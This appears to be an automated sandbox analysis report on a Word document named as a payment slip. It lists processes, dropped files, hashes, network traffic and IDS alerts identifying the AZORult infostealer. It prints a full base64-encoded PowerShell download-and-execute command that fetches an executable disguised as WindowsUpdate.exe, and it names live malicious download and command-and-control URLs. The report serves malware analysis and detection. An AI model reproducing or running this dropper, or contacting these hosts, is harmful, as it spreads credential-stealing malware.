3104 | PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2396 | "C:\Users\admin\Documents\WindowsUpdate.exe" | C:\Users\admin\Documents\WindowsUpdate.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3616 | "C:\Users\admin\AppData\Roaming\WindowsUpdate.exe" | C:\Users\admin\AppData\Roaming\WindowsUpdate.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3864 | "C:\Users\admin\Documents\WindowsUpdate.exe" | C:\Users\admin\Documents\WindowsUpdate.exe | WindowsUpdate.exe | |
User: admin Integrity Level: MEDIUM | ||||
4044 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | WindowsUpdate.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3728 | "C:\Users\admin\AppData\Roaming\WindowsUpdate.exe" | C:\Users\admin\AppData\Roaming\WindowsUpdate.exe | — | WindowsUpdate.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3960 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | WindowsUpdate.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA674.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJL6JM9VXS6ZHQZTH6V5.temp | — | |
MD5:— | SHA256:— | |||
3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ymentslip.doc | pgc | |
MD5:F11474E91EADE8904D99124E1C6973F2 | SHA256:D7F89F97B026532FC4389315114986F996150DBDAB0844714071552E9FB96F45 | |||
3464 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:32CA13FE69C2270F4F0B5DB85CD58DD7 | SHA256:20D4E0981933360A07ED8556C072B9E0871C26ADAEBB51BC2EDE902CD2407690 | |||
2396 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA | SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0 | |||
3616 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA | SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0 | |||
2396 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Chrome\StikyNot.exe | executable | |
MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA | SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0 | |||
3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ae93.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3104 | powershell.exe | C:\Users\admin\Documents\WindowsUpdate.exe | executable | |
MD5:D5C9A38AAD57817E3FB74E5E63F7CAEA | SHA256:F5CDCF7643D4C4AB803AA7F3CFA1830EFB7B9B9BA6B0A69B3093285391782EE0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3104 | powershell.exe | GET | 200 | 112.140.179.97:80 | http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe | AU | executable | 432 Kb | suspicious |
3104 | powershell.exe | GET | 200 | 112.140.179.97:80 | http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe | AU | executable | 432 Kb | suspicious |
3864 | WindowsUpdate.exe | POST | 200 | 185.126.200.160:80 | http://www.admindocmarkens.us/chib/index.php | IR | binary | 4.27 Mb | malicious |
3864 | WindowsUpdate.exe | POST | 200 | 185.126.200.160:80 | http://www.admindocmarkens.us/chib/index.php | IR | text | 2 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3864 | WindowsUpdate.exe | 185.126.200.160:80 | www.admindocmarkens.us | Tebyan-e-Noor Cultural-Artistic Institute | IR | malicious |
3104 | powershell.exe | 112.140.179.97:80 | host.workskillsweb.net | SYNERGY WHOLESALE PTY LTD | AU | suspicious |
Domain | IP | Reputation |
---|---|---|
host.workskillsweb.net |
| suspicious |
www.admindocmarkens.us |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3104 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3104 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3104 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3864 | WindowsUpdate.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult encrypted PE file |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |